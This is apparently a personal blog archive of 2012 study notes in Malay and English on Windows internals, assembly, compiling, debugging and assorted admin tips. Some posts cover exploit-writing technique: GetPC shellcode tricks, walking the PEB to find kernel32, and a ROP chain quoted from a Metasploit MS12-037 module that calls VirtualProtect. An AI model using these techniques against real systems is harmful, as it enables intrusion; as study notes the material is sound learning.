20 December 2012

header file and library(dll) yg perlu utk compile C

Masih keliru berkenaan header file dan library(samada dll atau libfoo.a) yang perlu ketika nak compile aturcara c

Di bawah adalah diskusi yg disedut dari http://mingw-users.1079350.n2.nabble.com/Win-API-documentation-td7302962.html.

-------- mail n -------------------------------------------------------
> For instance, the SafeArrayCreate function described at:
>
> http://msdn.microsoft.com/en-us/library/windows/desktop/ms221234%28v=vs.85%29.aspx
>
> Is that part of the core windows API?

Yes. If you read the document at that URI, it tells you which headers
to #include, which libraries with which to link, and which DLLs are
required at run time. So...

1) Check that MinGW provides the required header(s), (in c:\mingw\include
for a standard installation).

2) Check that the symbols you need to reference are defined, and that
functions you wish to call are declared, in the appropriate MinGW header;
(some are incomplete, due to inadequate documentation from Microsoft).

3) Check that MinGW provides the requisite libraries; (where Microsoft say
to use foo.lib, you look for libfoo.a or libfoo.dll.a, in c:\mingw\lib).

4) Check that the *system* provides the requisite DLLs; (most often, you
will find them in c:\windows\system32).

If all four checks pass, you should be able to use that API, without recourse
to any other resource.


----- mail n+1 -------------------------------------------------------------
> 3) Check that MinGW provides the requisite libraries; (where Microsoft say
> to use foo.lib, you look for libfoo.a or libfoo.dll.a, in c:\mingw\lib).

As an aside, isn't it true that current versions of the GNU linker can
link directly against the DLL, even if the import library libfoo.dll.a
is not available?


------mail n + 2 ---------------------------------------------------------------------
It is. You need to add the directory with .dll files to the linker path.

19 December 2012

Tracing

Tracing dalam ImmunityDebugger/Ollydbg
- boleh rewind semula context(register)
- tapi value dalam stack tak di simpan(stack view(stack border) akan berubah, tapi data dalam stack([esp]) tak ditunjukkan perubahan)

guna key:   -  dan +


Special Tracing
Untuk Start Tracing:
     Menu: Right-click ->  Run Trace -> Add Selection

Untuk Display Tracing:
     Menu: View -> Run Trace




entry point MingW vs VS2008

MingW
Kompiler MingW akan tulis 2 fungsi utk entrypoint, walaupun hanya guna satu utk setiap aplikasi.
Jika jenis console, entrypoint adalah pada fungsi  mainCRTStartup.
Jika ada gui(ada windows), entrypoint-nya adalah fungsi _WinMainCRTStartup.

Kedua-dua fungsi tersebut ada pada setiap exe, cuma maklumat pada PE header akan tentukan mana satu yang akan digunakan.



Graf di atas dihasilkan guna IDA (Menu View-> Graphs -> Xref to).
_main adalah fungsi main yang ditulis oleh coder. Sebelum itu terdapat fungsi ___mingw_CRTStartup yang menjadi perantara antara fungsi entrypoint dan _main.


Visual Studio 2008
Project template guna  "Win32 Console Application"

Dari IDA, dapat diketahui, function __tmainCRTStartup() akan panggil _main()(main function yg ditulis oleh coder). Walaubagaimanapun, entrypoint sebenar bukan __tmainCRTStartup(), tetapi adalah wmainCRTStartup().
Features graph pada IDA tak tunjuk wmainCRTStartup() mungkin disebabkan arahan jmp(bukan call) yg digunakan utk masuk __tmainCRTStartup() spt yg ditunjukkan pada address 0x4012C7 pada gambar berikut.

18 December 2012

nota peringatan berkenaan SDK



This might sound weird to you, but you didn't need to download any separate Windows SDK to develop for Windows, because Visual Studio, and MingW/GCC, and others, already commonly include all that most people would need. (Some people would say, that Visual Studio and other tools, ship with their own version of the SDK, but I think that's merely confusing the issue further.)

You need Visual Studio first. And maybe, some day later, you might want to add the Windows SDK add on to it, but it is not intended to be used by itself, or in combination with GCC. Basically, some of the SDK content duplicates stuff that is already included in Visual C++ and Visual Studio and some of it is additional tools like WinDbg.

Let me explain. The Windows SDK is indeed, useful for doing certain things in Windows that beginners are unlikely to need to do. For example, if you need to integrate with some specialized APIs, the Windows SDK contains a lot of documentation, examples, and a more complete set of header files that weren't included in Visual Studio because they're less frequently used APIs. The core API headers and documentation for Windows are already in Visual Studio, so technically, Visual Studio already contains the core SDK, and the so called SDK is an "auxiliary SDK", or a "low level SDK for purists, advanced users, and certain kinds of systems or native-level programming", but not needed, for most typical end-user applications development.

But if you want to learn Win32 native programming using C or C++, or you just want to write native Windows applications you PROBABLY don't need anything that comes in the SDK, and even then you need Visual Studio first, and the SDK second. Let me explain:


Many tools that let you write pure native Windows applications, provide higher level APIs, including Visual Studio, which gives you MFC or ATL. None of those tools need the SDK to work. The SDK, so called, is more of a "extra crap that we don't ship with visual studio because hardly anybody needs it", which Microsoft abbreviated to SDK. I know. Weird.


You don't need the SDK at all if you intend to use GCC. If you want to write an application for Windows in bare C or bare C++, you can just install mingw if you insist on using gcc and working from the command line.


The normal way to write native applications is to use the free Microsoft Visual C++ Express edition, and you can use it to write either C or C++ apps, and it includes the header files and libraries you need to write almost any native windows application feature you need, without any need for the SDK. Visual Studio is a nice modern IDE, and lots of convenient cool features like code completion and so on. The SDK you downloaded doesn't contain any of that.


Anything you do need to know about the raw Win32 APIs you can learn using the Web format of the MSDN documentation, or the help in Visual Studio. The basic Windows APIs like WinCreateWindow, are documented already in the Visual Studio help and MSDN help, and you don't need the SDK docs for most of the core windows APIs.

If you're just getting started, can I suggest you should just go get the free (but not open source) Visual Studio 2010 Express. That's the recommended way to get started, not the SDK.

I'm quite sure that the Windows 7 SDK that you downloaded is not intended for use with GCC anyways, and if you need a version of windows header files that work with a Gnu C/C++ compiler, any basic Win32 APIs like GDI and the basic Windowing API stuff is already bundled in mingw version of gcc.

You might also want to know about the DDK, which is like the SDK but which is oriented towards Device Driver and native NT-mode development.


22 November 2012

CSR Certificate Signing Request

Permohonan utk Sign Certificate



following steps found at:
        https://devcenter.heroku.com/articles/csr

1) creating private key
        openssl genrsa -des3 -out server.orig.key 2048
2) creating passphrase-less key
        openssl rsa -in server.orig.key -out server.key
3) generate csr(certificate signing request)
        openssl req -new -key server.key -out server.csr

additional:

to generate public key from the private key
        openssl rsa -in server.orig.key -pubout > server.orig.key.pub

16 November 2012

optimus on linux

https://wiki.ubuntu.com/Bumblebee


Bumblebee aims to provide support for NVIDIA Optimus laptops for GNU/Linux distributions. Using Bumblebee, you can use your NVIDIA card for renderinggraphics which will be displayed using the Intel card.

08 November 2012

compile assembly 32 bit atas platform 64 bit

Atas ubuntu 64 bit.

Utk kompile binary 64 bit:
nasm -f elf64 -g -F stabs a-eatclib.asm
gcc a-eatclib.o -o a-eatclib



Utk kompile binary 32 bit:
nasm -f elf -g -F stabs a-eatclib.asm
gcc a-eatclib.o -o a-eatclib -m32


assembly panggil libc

cara assembly  panggil libc:  [printf]

; cara nak kompil

;    nasm -f elf -g -F stabs a-eatclib.asm
;    gcc a-eatclib.o -o a-eatclib -m32


EatMsg: db "Saya makan Nasi 0x%x pinggan/n",0
EatMsg2: db "Saya makan Nasi 0x%x pinggan/n",10, 0  ; yg ni baru ada new line
extern printf
global main ; Required so linker can find entry point

main:
push ebp ; Set up stack frame for debugger
mov ebp,esp
push ebx ; Program must preserve ebp, ebx, esi, & edi
push esi
push edi
;;; Everything before this is boilerplate; use it for all ordinary apps!

push esp
push EatMsg
call printf
add esp, 4

;;; Everything after this is boilerplate; use it for all ordinary apps!
pop edi ; Restore saved registers
pop esi
pop ebx
mov esp,ebp ; Destroy stack frame before returning
pop ebp
ret ; Return control to Linux

01 November 2012

encrypt: loop file


LOOP TUTORIAL
loop tutorial at http://www.saout.de/tikiwiki/tiki-index.php?page=looptutorial

Setting the Loop File
        1>      dd if=/dev/urandom of=/home/secret bs=1M count=100
        2>      losetup /dev/loop0 /home/secret
        3>      modprobe dm_crypt
        4>      cryptsetup -c aes -y create secret /dev/loop0
        5>      mke2fs -j /dev/mapper/secret     (ext3)
        5>      mke2fs -t ext4 -j /dev/mapper/secret     (ext3)
        6>      mount /dev/mapper/secret /mnt/secret

getPC

GetPC:


Kaedah 1.
$+0:    E8 00000000 CALL    $+5         ; PUSH $+5 onto the stack
$+5:    59          POP     ECX         ; ECX = $+5
$+6:    ...shellcode...

Oleh kerana argument kepada CALL (E8) adalah relatif(offset) kepada kod CALL, maka value-nya ialah 0. Tapi nullbyte ni tak boleh guna dalam shell code.


Kaedah 2)
$+0     EB XX       JMP     SHORT $+N   ; Jump to the call instruction
$+5:    59          POP     ECX         ; ECX = $+N+5
$+6:    ...shellcode...
$+N:    E8 FFFFFFXX CALL    $+5         ; PUSH $+N+5 onto the stack and jump back to $+5
Kaedah ni limitationnya adalah pada saiz shellcode. Saiz maksimum adalah 126 bytes. Kalau nak lebih besar, kena buat jump pada lokasi $+N-2, jump kepada $+N+5.
Flow eip seperti berikut:
  1. $+0
  2. $+N
  3. $+5   ;  ecx  dapat lokasi $+N+5
  4. $+6   ;  execute shellcode


Kaedah 3)
$+0  EB FFFFFFFF CALL    $+4         ; PUSH $+5 onto the stack and jump to $+4
$+5: C8 59XX XX  ENTER   XX59,XX     ; Does not get executed like this; see below.
Kaedah guna trik yg menarik. Bila [call $+4 ] di larikan, EIP akan jadi $+4, bukan $+5. Jadi instruction yg akan dijalankan adalah spt berikut:
$+4:  FFC8     DEC     ECX   ; Does nothing useful; can be considered a NOP.
$+6:  59       POP     ECX   ; ECX = $+5
$+7:    ...shellcode...


17 October 2012

Gmail down


miniFlame

Once installed, MiniFlame operates as a backdoor and enables the malware operators to obtain any file from an infected machine, according to research from Kaspersky Lab.

The malware can also capture screenshots from infected PCs when people use a
  • specified application, 
  • IM service, or 
  • FTP client, or 
send data to a C&C server.

"Separately, at the request from MiniFlame's C&C operator, an additional data-stealing module can be sent to an infected system, which infects USB drives and uses them to store data that's collected from infected machines without an Internet connection," said Kaspersky Lab.

To recap the malware family tree: Flame was discovered in May 2012. It was initially dismissed by some security researchers as bloatware, in part because of the application's size--20 MB with all modules installed, versus an average of up to 1 MB for most other malware. But ongoing analysis of Flame yielded numerous surprises, including its designers having tapped world-class crypto to imbue the malware with the ability to spoof Windows Update and automatically install itself on targeted computers.

Relation on Flame and Gauss
MiniFlame's ability to be used as a plug-in by either Flame or Gauss clearly connects the collaboration between the development teams of both Flame and Gauss," according to Kaspersky Lab's research. "Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same 'cyber warfare' factory."



ref> http://www.informationweek.com/security/vulnerabilities/meet-flame-espionage-malware-cousin-mini/240009131

13 September 2012

gcc

Compile:
   gcc -o run.exe sourceCode.c

Assembly file (syntax intel)
    gcc -o run.exe sourceCode.c  -S -masm=intel

32bit (on linux kena install sudo apt-get install gcc-multilib)
    gcc -o run.exe sourceCode.c  -S -masm=intel -m32


Jgn buang temporary file ( .i(substitutions), .s(assembly code), .o(object code))
    gcc -o run.exe sourceCode.c  -S -masm=intel -m32 -save-temps

masih signed dan unsigned

Kes 1
c code:
unsigned int a = 5;
signed int b = -1;
if(a > b)
assembly code:
mov DWORD PTR [esp+24], 5
mov DWORD PTR [esp+28], -1
mov eax, DWORD PTR [esp+28]
cmp eax, DWORD PTR [esp+24]
jae .L2


Kes 2
c code:
     signed int a = 5;
     signed int b = -1;
     if(a > b)

assembly code:
        mov     DWORD PTR [esp+24], 5
        mov     DWORD PTR [esp+28], -1
        mov     eax, DWORD PTR [esp+24]
        cmp     eax, DWORD PTR [esp+28]
        jle     .L2 



Kesimpulan:
jika a dan b adalah signed int, maka compiler akan guna jle.
Tapi jika salah satu unsigned int, maka compiler akan guna jae(sebab eax = esp+28 instead +24)

12 September 2012

signed vs unsigned int

01 void main(){
02     unsigned int a = 5;
03     signed int b = -1;
04     if(a > b)
05         printf("True");
06     else
07         printf("False");
08     }

Hasil >>  False  ( line 07)

Kenapa?
Sebab perbandingan di buat antara signed dan unsigned.
Compiler akan assume perbandingan dibuat guna mode unsigned.

Note:  jika mode signed, assembly instruction yg digunakan adalah jg(jump greater ).
Jika mode unsigned, assembly instruction adalalah ja(jump above )

Data variable a yg disimpan dalam memori adalah 0x00000005.
Data variable b yg disimpan dalam memori adalah 0xffffffff (value adalah -1)

utk jg:
  a > b    # hasilnya true

utk ja:
  a > b    # hasilnya false  (sebab 0x00000005 (a) lebih kecil dari  0xffffffff (b) )

assembly code utk line 04:
mov eax, 0x5
mov ebx, 0xffffffff
cmp eax, ebx
ja binary.true

(kalau both variable adalah signed int, compiler akan gunakan jg, bukan ja)

extra:
JG will jump if ZF = 0 and SF = OF
JA will jump if CF = 0 and ZF = 0
(ref. http://www.unixwiz.net/techtips/x86-jumps.html)

05 September 2012

ror x86

shift right ->(digit paling kanan pindah letak kat depan)

katakan a = 1001   ; 9

ror a, 1  ->>  1100 ; c
ror a, 2  ->>  0110 ; 6
ror a, 3  ->>  0011 ; 3


katakan eax = 90 00 00 09      <  1001 0000 0000 0000 0000 0000 0000 1001
ror eax, 1 >>    c8 00 00 04     < 1100 1000 0000 0000 0000 0000 0000 0100
ror eax, 2 >>    64 00 00 02     < 0110 0100 0000 0000 0000 0000 0000 0010
ror eax, 3 >>    32 00 00 01     < 0011 0010 0000 0000 0000 0000 0000 0001

02 August 2012

jejak ralat libemu


1) run python dlm gdb(maksudnya, debug mode)
# gdb /usr/bin/python

2) Start python
(gdb) run

3) Jika nama file libemu_test.py, maka
>> import libemu_test
0x401019L hex: A83D asm: test al,0x3d
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()

4) Back trace
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x00007ffff58650f6 in emu_cpu_step (c=0xc3fb40) at emu_cpu.c:839
#2  0x00007ffff5b51fbb in __pyx_pf_8pylibemu_8Emulator_25cpu_step (__pyx_v_self=, unused=)
    at src/pylibemu.c:6735
#3  0x000000000042afec in PyEval_EvalFrameEx ()
#4  0x00000000004317f2 in PyEval_EvalCodeEx ()
#5  0x000000000054a078 in PyImport_ExecCodeModuleEx ()
#6  0x000000000050d091 in ?? ()
#7  0x000000000050da8b in ?? ()



5) tukar kepada frame 1  (frame ni refering to stack) (rasanya lah:))
(gdb) frame 1
#1  0x00007ffff58650f6 in emu_cpu_step (c=0xc3fb40) at emu_cpu.c:839
839                     ret = c->cpu_instr_info->function(c, &c->instr.cpu);


6)
(gdb) ptype c
type = struct emu_cpu {
    struct emu *emu;
    struct emu_memory *mem;
    uint32_t debugflags;
    uint32_t eip;
    uint32_t eflags;
    uint32_t reg[8];
    uint16_t *reg16[8];
    uint8_t *reg8[8];
    struct emu_instruction instr;
    struct emu_cpu_instruction_info *cpu_instr_info;
    uint32_t last_fpu_instr[2];
    char *instr_string;
    _Bool repeat_current_instr;
    struct emu_track_and_source *tracking;
} *

7)
(gdb) print c
$1 = (struct emu_cpu *) 0xc3fb40

8)
(gdb) print c->cpu_instr_info
$2 = (struct emu_cpu_instruction_info *) 0x7ffff5aedbc0

9)
(gdb) print c->cpu_instr_info->function
$3 = (int32_t (*)(struct emu_cpu *, struct emu_cpu_instruction *)) 0
sah yang problem adalah kat sini, sebab value adalah 0 (kosong)(yg paling kanan). Maksudnya pointer fungsi 'function' point to null.

Maka kena semak code yang initialize cpu_instr_info-> function



10)
(gdb) ptype c->cpu_instr_info
type = struct emu_cpu_instruction_info {
    int32_t (*function)(struct emu_cpu *, struct emu_cpu_instruction *);
    const char *name;
    struct {
        uint8_t s_bit : 1;
        uint8_t w_bit : 1;
        uint8_t modrm_byte : 4;
        uint8_t imm_data : 3;
        uint8_t disp_data : 3;
        uint8_t level : 2;
        uint8_t type : 2;
        uint8_t fpu_info : 1;
    } format;
} *

04 July 2012

jelajah PEB

1) struktur: PEB_LDR_DATA
typedef struct _PEB_LDR_DATA
{
0x0      ULONG Length;
0x4      BOOLEAN Initialized;
0x8      PVOID SsHandle;
0xc      LIST_ENTRY InLoadOrderModuleList;
0x14     LIST_ENTRY InMemoryOrderModuleList;
0x1c     LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;


Cara nak dapatkan struktur ini adalah:
mov eax, fs:[30]  ; -> eax adalah lokasi PEB
mov eax, [ eax + 0xc] ; ->  eax adalah lokasi PEB_LDR_DATA berada

[PEB_LDR_DATA.InInitializationOrderModuleList] -> First LDR_DATA_TABLE_ENTRY struktur


2) struktur: LDR_DATA_TABLE_ENTRY
typedef struct _LDR_DATA_TABLE_ENTRY
{
0x0    LIST_ENTRY InLoadOrderLinks;
0x8    LIST_ENTRY InMemoryOrderLinks;
0x10   LIST_ENTRY InInitializationOrderLinks;
0x18   PVOID DllBase;
0x1c   PVOID EntryPoint;
0x20   ULONG SizeOfImage;
0x24   UNICODE_STRING FullDllName;
0x2c   UNICODE_STRING BaseDllName;
       ULONG Flags;
       WORD LoadCount;
       WORD TlsIndex;
       union
       {
            LIST_ENTRY HashLinks;
            struct
            {
                 PVOID SectionPointer;
                 ULONG CheckSum;
            };
       };
       union
       {
            ULONG TimeDateStamp;
            PVOID LoadedImports;
       };
       _ACTIVATION_CONTEXT * EntryPointActivationContext;
       PVOID PatchInformation;
       LIST_ENTRY ForwarderLinks;
       LIST_ENTRY ServiceTagLinks;
       LIST_ENTRY StaticLinks;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

FullDllName -> nama dll beserta lokasi file (UNICODE "C:\Windows\system32\kernel32.dll")
BaseDllName -> hanya nama dll   (UNICODE "kernel32.dll")

*note: dlm libemu, FullDllName adalah empty, so kalau shellcode guna FullDllName instead of BaseDllName, libemu tak dapat simulasikan shellcode. Boleh consider sebagai anti-libemu features


3) UNICODE_STRING (8 byte)

typedef struct _UNICODE_STRING
{
     WORD Length;                2 byte
     WORD MaximumLength;         2 byte
     WORD * Buffer;              4 byte (pointer to word)
} UNICODE_STRING, *PUNICODE_STRING;

Maka, offset utk BaseDLLName : 0x2c + 4 = 0x30


ref  http://undocumented.ntinternals.net/UserMode/Structures/PEB_LDR_DATA.html
ref >> http://www.nirsoft.net/kernel_struct/vista/LDR_DATA_TABLE_ENTRY.html

IMAGE_EXPORT_DIRECTORY (struktur)

public struct IMAGE_EXPORT_DIRECTORY
{
0x00    public UInt32 Characteristics;
0x04    public UInt32 TimeDateStamp;
0x08    public UInt16 MajorVersion;
0x0a    public UInt16 MinorVersion;
0x0c    public UInt32 Name;
0x10    public UInt32 Base;
0x14    public UInt32 NumberOfFunctions;
0x18    public UInt32 NumberOfNames;
0x1c    public UInt32 AddressOfFunctions; // RVA from base of image
0x20    public UInt32 AddressOfNames; // RVA from base of image
0x24    public UInt32 AddressOfNameOrdinals; // RVA from base of image
}


imageBase + DataDirectories[ExportDir RVA]  = adalah pointer kepada struktur kat atas


opcode kepada assembly

objdump -b binary -m i386 -D shellcode.bin

refer to http://siperdana.blogspot.com/2012/05/convert-assembly-to-opcode.html

02 July 2012

mysql hex dan reverse

SELECT HEX( 65 ) , CAST( 0x41 AS UNSIGNED )
>>
hex(65)cast(0x41 as unsigned)
4165

28 June 2012

String dalam memori

Andaikan x ada array of char dan
*x='saya'
ini bermaksud

x[0] = 's' ; >> 0x73 << dlm python : hex(ord('s'))
x[1] = 'a' ; >> 0x61
x[2] = 'y' ; >> 0x79
x[3] = 'a' ; >> 0x61

dalam memori:
alamatdata
0x904F000
73
0x904F001
61
0x904F002
79
0x904F003
61
Perhatikan: data dalam memori tak terbalik pun, berbanding kalau type adalah dword, atau word(artikel sebelum ni)

Jadi kalau panggil ReadProcessMemory
-pada alamat 0x904F000
-sebanyak 4 byte
-hasil >> 0x73617961

dalam kes ni tak perlu nak reverse alamat (or anything yg related to LITTLE-ENDIAN) sebab char adalah 1 byte.

Bagaimana data disimpan dalam memori

x = 0x12345678
Andaikan x adalah DWORD variable, dan data x di simpan di alamat 0x904F000

Jika dilihat dalam Virtual Memory(blh guna immunity debugger, windbg), yang disimpan adalah
terbalik, iaitu 78563412
atau lebih terperinci spt dibawah:

alamatdata
0x904F000 78
0x904F001 56
0x904F002 34
0x904F003 12

Bila guna winapi ReadProcessMemory

Syntax



BOOL WINAPI ReadProcessMemory(
  __in   HANDLE hProcess,
  __in   LPCVOID lpBaseAddress,
  __out  LPVOID lpBuffer,
  __in   SIZE_T nSize,
  __out  SIZE_T *lpNumberOfBytesRead
);



Lihat parameter ke-3, lpBuffer berjenis LPVOID,  maksudnya boleh guna char, word, dword etc.

REadProcessMemory(-1, 0x904f000, [array of dword], 4, 0)
hasil >>
dword[0] = 305419896 ; yg mana hex(dword[0]) akan dapat semula nilai > 0x12345678


Tapi kalau lpBuffer berjenis word(array)
REadProcessMemory(-1, 0x904f000, [array of word], 4, 0)
hasil >>
word[0] = 22136 ; yg mana hex(word[0]) akan dapat semula nilai > 0x5678
dan
word[1] = 4660 ; yg mana hex(word[1]) akan dapat semula nilai > 0x1234


RUMUSAN:
word[0] bersaiz 2 byte,(ambil data dari 2 alamat)
jadi word[0] diambil dari alamat 0x904F000 (0x78) dan 0x904F001  (0x56)

tapi sebab cpu ni litte endian, kena baca dari alamat secara terbalik
0x904F001 (0x56)
0x904F000 (0x78) >> 0x5678

dan word[1] akan ambil data dari
0x904F003 (0x12) dan
0x904F002 (0x34) >> 0x1234

Manakala
dword pulak bersaiz 4 byte. (ambil data dari 4 alamat), so dword[0] akan ambil data dari
0x904F003 (0x12) dan
0x904F002 (0x34) dan
0x904F001 (0x56) dan
0x904F000 (0x78) >> 0x12345678


Bagaimana pula kalau char/byte ??
hint: char saiz 1 byte. (ambil data dari 1 alamat)


26 June 2012

semak IAT(import adress table)


File: msvcr71.dll
ASLR: no



DLL ni hanya import funtion dari kernel32.dll sahaja. 

PE_header.ImageBaseAddress = 7c340000 (dlm Optional Header)
PE_header.ImportTableAddress = 49298(rva) =7c389298(va)


[PE_header.ImportTableAddress + 0] = OFT
[PE_header.ImportTableAddress + 4] = TimeDateStamp
[PE_header.ImportTableAddress + 8] = ForwarderChain
[PE_header.ImportTableAddress + c] = NameRVA
[PE_header.ImportTableAddress + 10] = FT




1) OFT : 7c389298.
[7c389298] = 0492d0(va) = 7c3892d0(va)
7c3892d0 adalah permulaan array 4 byte yang mengandungi pointer ke string nama fungsi winAPI.


index Adr X Content of
X (rva)
ImageBase
+ rva = (va)
Content
(va)
Content (va + 2)
0 7c3892d0 4953c 7c38953c 65 01 GetModuleFileNameA
1 7c3892d4 49552 7c389552 66 01 GetModuleFileNameW
2 7c3892d8 49568 7c389568 AB 00 ExitProcess






50 7c389410 49af4 7c389af4 5b 03 VirtualProtect


2) Nama RVA: 7c3892a8
    Pointer kepada nama module >> KERNEL32.dll

3) FT: 3A000
    Pointer ke array yg simpan alamat fungsi winapi. Indeks-nya sama turutan dengan OFT.

    contoh utk cari alamat VirtualProtect:
    Gelinter item dalam array OFT,
          jika pointer tersebut = NamaFungsi,
                simpan no Indeks pada eax.
    jmp [eax]



22 June 2012

ROP Guna "hard-coded address" (IAT)

metasploit: ms12-037

Ada 2 rop implementation, satu utk xp sp3, satu lagi utk win7 sp1

Merujuk rop utk win7 sp1, guna msvcr71.dll( jre-6 update-26)


0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000,  # (dwSize)
0x7c347f98,  # RETN (ROP NOP)
0x7c3415a2,  # JMP [EAX]
0xffffffff,
0x7c376402,  # skip 4 bytes
0x7c345255,  # INC EBX # FPATAN # RETN
0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87,  # POP EDX # RETN
0x00000040,  # flNewProtect
0x7c34d201,  # POP ECX # RETN
0x7c38b001,  # &Writable location
0x7c347f97,  # POP EAX # RETN
0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
0x7c345c30,  # ptr to 'push esp #  ret '



Baris 3 terakhir: (0x7c37a151  + 0x0EF )adalah merujuk kepada lokasi kawasan yang mana maklumat IAT disimpan utk dll msvcr71.dll.  Data dalam alamat tersebut adalah pointer kepada kernel32.VirtualProtect. 

Jadi, walaupun address hard-coded digunakan utk call VirtualProtect, tapi shellcode ini tetap portable.  
Kudos to metasploit for expose this nice trick.


Arah kiblat

Setahun 2 kali matahari ada tepat atas kaabah.
1) 28 Mei  5:16pm
2) 16 Julai 5:28pm

Pada waktu ni, arah kiblat akan selari dengan bayang2.


ref: http://www.falak-online.net/download/istiwamataharikaabah.pdf

21 June 2012

apa itu kuantum komputer

Penggunaan  keterkaitan antara 2 entiti  di aplikasikan dalam pembinaan komputer.
Apa dia keterkaitan (Entanglement)



Entanglement:


for dummies:

I'm  hunger for more:

Dimensi

4th Dimension:


4th dimension for dummies:



hit me some more:







Now you think you understand the Third dimension? hmm. not quite.

19 June 2012

18 June 2012

xpra : remote gui

run gui program pada remote server. Kelebihannya boleh detach dan re-attach semula tanpa matikan program tersebut.

pd server:
$ xpra start :7
$ DISPLAY=:7 firefox

pd client:
$ xpra attach ssh:10.0.0.1:7 ;  #  gui firefox akan terpapar di desktop client
$ CTRL +C ;  # utk detach.  program firefox takkan mati. run semula xpra attach utk continue session

lain:
xpra list
xpra version

python binary


2 baris berikut, sama:
packed_data = binascii.unhexlify('0100000061620000cdcc2c40')
packed_data = '0100000061620000cdcc2c40'.decode('hex')

16 June 2012

cari url gambar dalam album picasa

cara nak dapatkan url gambar dari album picasa.


<?php
// Input
$user_name = "xxxx@gmail.com";
$picasa_album_id = "5726978903470698481";
// nak cari album id, gi kat picasaweb, masuk album, klik rss.

// build feed URL
$feedURL ="https://picasaweb.google.com/data/feed/api/user/$user_name/albumid/$picasa_album_id";
// read feed into SimpleXML object
$sxml = simplexml_load_file($feedURL);
// get album names and number of photos in each
$bil = 1;
foreach ($sxml->entry as $entry) {
    $urlgambar = $entry->content['src'];
    $path = split('/', $urlgambar);
    $s800gambar = $path[0].'//'.$path[2].'/'.$path[3].'/'.$path[4].'/'.$path[5].'/'.$path[6].'/s800/'.$path[7];
    print_r($path);
    print $s800gambar;
    $bil++;
}
?>

15 June 2012

10.04 tak de new upgrade

dlm 10.04 (ubuntu)
# do-release-upgrade
No new release found

hairan,  12.04 dah lama kluar dah.

By default LTS kena tunggu first release point(12.04.1).
Tapi kalau tak sabar gak,
do-release-upgrade -d

Tapi developer suggest tunggu 12.04.1


This is what the release notes say:
Upgrades from Ubuntu 10.04 LTS to 12.04 LTS do not work using the alternate CD or the server CD as a package repository. It is recommended that users running Ubuntu 10.04 LTS wait for the 12.04.1 LTS point release, scheduled for July, before upgrading. (988941)






http://askubuntu.com/questions/125392/why-is-no-new-release-found-when-upgrading-10-04-to-12-04-lts

unicode kepada shellcode

biasa jumpa dalam javascript
%u16eb%u41b9%f4de

Ia adalah unicode, bersaiz 16 bit(2Byte)

Oleh kerana x86 adalah little-endian, so kalau dilihat dalam virtual memory akan jadi spt berikut:
eb 16 b9 41 de f4

extra:
dlm memory, 1 location(address) boleh isi 8 bit. 
Contoh 
  • alamat 13df000 : eb
  • alamat 13df001 : 16
  • alamat 13df002 : b9
  • alamat 13df003 : 41
  • alamat 13df004 : de
  • alamat 13df005 : f4

Dulu I wonder kenapa %u16eb jadi [eb 16]? org kata little-endian, so kena terbalikkan. Tapi kenapa [eb] tu tak diterbalikkan jadi [be] plak? Maknanya instead of [eb 16], jadi [be 61]?

Rupanya little-endian ni hanya pada susunan alamat memori je. Tapi 8 bit yg dlm alamat tersebut tetap sama je.

loop x86

loop next:
jump to next jika ecx > 0

if ecx > 0
    eip = next


13 June 2012

cld vs std

cld akan setkan DF(direction flag) kepada 0
std akan setkan DF kepada 1

DF akan tentukan nilai ESI menaik atau menurun utk arahan 'lodsd'


mov esi, 40100; esi: 40100
cld           ; DF: 0
lodsd         ; esi: 40104
lodsd         ; esi: 40108
std           ; DF: 1
lodsd         ; esi: 40104
lodsd         ; esi: 40100

url gambar picasa bertukar

Dalam picasaweb, album properties:

Tiap kali set permisi 'Limited, anyone with the link' utk album , semua direct link ke setiap gambar dalam album tersebut akan bertukar.

So, kena set Limited dulu, pastu baru dptkan direct link ke setiap gambar.

Kalau tukar public, pastu tukar Limited semula, kena dapatkan semula url utk gambar, sebab url direct-link yg sebelum ni dah tak boleh pakai. << Apa punya features ni ????. Someone please tell picasa developer.

URL sebelum set limit:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHcw/1GC_mXllVJ8/s800/bahan.JPG

URL selepas set kepada Limited:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHc4/AXTkphgKDog/s800/bahan.JPG

Album Id Picasa

Cara nak dapat album ID dari picasaweb

Go to your PWA account and click on the album in question.
Click on the 'RSS' link to the right.

You should get something like the following:
picasaweb.google.com/data/feed/base/user/PWAusername/albumid/1234567890123456789?alt=rss&kind=photo&hl=en_US
Notice the long string of digits; that's your Album ID.


ref: earth net

12 June 2012

cari kernel32.dll dalam virtual memory

TEB -> PEB -> kernel32


xor eax, eax               ;    nape la nak zero kan eax tu?
mov eax, [fs:eax+0x30]     ;    eax =7ffdf000
mov eax, [eax + 0x0c]      ;    eax =774a7880
mov esi, [eax + 0x1c]      ;    esi  = 000b1bc0
lodsd                      ;    eax = 000b2000
                            ;    esi  = 000b1bc4
mov eax, [eax + 8]          ;    eax = 75600000  << lokasi kernel32.dll dlm va



Kalau faham,
1) apa value pada lokasi 0x000b1bc4?
2) apa value pada lokasi 0x000b2004?


ref : Practical Malware Analysis(ms/414)
1)774a789c
2)000b1bc0

LODSD

opcode:AD
assembly:  LODSD

equal to>>
mov eax,[esi]
add esi,4

KiServiceTable

KiServiceTable tak di export oleh kernel.

Cara nak dapatkannya ialah dari KeServiceDescriptorTable


typedef struct ServiceDescriptorTable {
    SDE ServiceDescriptor[4];
} SDT;

typedef struct ServiceDescriptorEntry {
    PDWORD KiServiceTable;
    PDWORD CounterTableBase;
    DWORD ServiceLimit;
    PBYTE ArgumentTable;
} SDE;



KeServiceDescriptorTable.ServiceDescriptor[0].KiServiceTable < pointer ke KiServiceTable
KeServiceDescriptorTable.ServiceDescriptor[0].ServiceLimit  < size array KiServiceTable

ServiceDescriptor yang lain tak pakai.
